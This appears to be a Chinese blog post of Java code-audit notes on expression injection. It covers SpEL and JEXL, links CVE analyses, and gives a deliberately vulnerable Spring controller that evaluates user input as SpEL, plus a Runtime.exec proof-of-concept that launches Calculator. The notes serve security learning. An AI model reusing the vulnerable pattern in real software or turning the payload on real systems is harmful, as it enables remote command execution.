java代码审计--表达式注入

た入场券 2022-09-11 09:22 276阅读 0赞

一.java表达式常见引擎和语言  
jexl–>表达式引擎  
[Nexus Repository Manager 3 RCE 分析 -【CVE-2019-7238][Nexus Repository Manager 3 RCE _ -_CVE-2019-7238]

spel–>spring表达式语言  
[spel表达式语言学习][spel]  
spel基础知识

`两种用法`

1.在代码中处理外部传入的表达式(重点是这个)
    
    @RequestMapping("/spel")
    public String spel(@RequestParam(name = "spel") String spel) { 
        ExpressionParser expressionParser = new SpelExpressionParser();//创建解析器
        Expression expression = expressionParser.parseExpression(spel);//解析传入的spel的表达式对象
        Object object = expression.getValue();//传入spel的表达式值
        return object.toString();
    }
    
    2.spel基于bean的使用
    
    2.1xml用法
    <bean id="Bean1" class="com.test.xxx">
    	<property name="arg" value="#{表达式}">
    </bean>
    相关漏洞:反序列化让程序加载我们实现构造好的恶意xml文件，jackson的CVE-2017-17485、weblogic的CVE-2019-2725等。
    
    2.2注解用法(一般是写死的)
    public class EmailSender { 
        @Value("${spring.mail.username}")
        private String mailUsername;
        @Value("#{ systemProperties['user.region'] }")    
        private String defaultLocale;
        //...
    }

`spel漏洞案例`  
1.类类型表达式,弹出计算器

ExpressionParser parser = new SpelExpressionParser();
    Expression exp = parser.parseExpression("T(java.lang.Runtime).getRuntime().exec(\"open /Applications/Calculator.app\")");
    Object value = exp.getValue();
    
    导致原因:
    ①默认的EvaluationContext可以执行所有的接口,没有任何的功能接口限制,可以执行任意命令。

[spel漏洞分析][spel 1]

[java 表达式注入从入门到放弃,其他的思路点][java]

[Nexus Repository Manager 3 RCE _ -_CVE-2019-7238]: https://xz.aliyun.com/t/4136
[spel]: https://zhuanlan.zhihu.com/p/174786047
[spel 1]: http://rui0.cn/archives/1043
[java]: https://aluvion.github.io/2019/04/25/Java%E7%89%B9%E8%89%B2-%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E6%94%BE%E5%BC%83/